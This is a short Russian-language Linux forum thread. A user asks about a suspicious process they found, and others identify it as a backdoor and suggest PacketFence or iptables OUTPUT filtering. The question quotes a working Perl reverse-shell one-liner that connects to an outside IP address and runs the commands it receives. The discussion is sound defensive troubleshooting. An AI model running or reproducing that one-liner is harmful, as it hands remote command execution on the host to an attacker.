Linux/*BSD и всё что с ними связано.
Модераторы: Admins, Модераторы
-
EXA
- Сообщения: 487
- Зарегистрирован: 24 фев 2008, 17:28
Сообщение
EXA » 26 дек 2013, 06:19
День добрый, всем.
perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"80.86.88.130:15000");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
Это процесс который что-то отправляет с стандартного ввода?
-
bg1
- Сообщения: 238
- Зарегистрирован: 11 ноя 2010, 21:11
Сообщение
bg1 » 04 июл 2014, 21:34
бакдорчик
-
anest
- Модератор
- Сообщения: 5708
- Зарегистрирован: 28 ноя 2004, 10:04
Сообщение
anest » 05 июл 2014, 01:07
Наверное пора подумать о создании smart файрволов и тп. Я счас изучаю packetfence, перспективный проект. Но может есть и другие решения для автоматизированного отлавливания любой подозрительной активности и автоматической ее блокировки.
-
Zavr2008
- Сообщения: 535
- Зарегистрирован: 19 июл 2013, 00:12
-
Контактная информация:
Сообщение
Zavr2008 » 11 июл 2014, 00:21
Не проще на серваке с Asterisk в iptables правильно настроить цепочку OUTPUT для пакетов TCP? То же самое и на роутике..
Так можно и обнаруживать подобную байду..
